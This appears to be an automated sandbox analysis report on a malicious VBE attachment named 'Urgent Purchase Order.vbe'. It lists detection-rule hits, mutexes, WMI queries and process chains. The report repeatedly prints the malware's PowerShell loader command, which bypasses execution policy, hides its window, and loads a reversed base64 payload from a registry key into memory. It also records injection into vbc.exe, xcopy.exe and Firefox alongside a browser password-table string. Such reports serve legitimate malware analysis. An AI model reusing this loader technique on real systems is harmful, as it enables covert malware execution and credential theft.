Source: Process Memory Space: powershell.exe PID: 9104, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1936, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3956, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5296, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8784, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2680, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2544, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7576, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBE@66/29@16/10

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\LKeZAYNmpVLnixJ.vbs

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2392:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3308:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2636:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9112:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8912:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-399786117
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4l2dozp.0d4.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\LKeZAYNmpVLnixJ.vbs"

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='vbc.exe'

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: xcopy.exe, 00000012.00000002.3719828859.00000000030A4000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1742191258.0000000003099000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1742078898.0000000003078000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000002.3719828859.0000000003099000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000002.3719828859.00000000030C8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Urgent Purchase Order.vbe

Virustotal: Detection: 12%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Purchase Order.vbe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\LKeZAYNmpVLnixJ.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\SysWOW64\xcopy.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
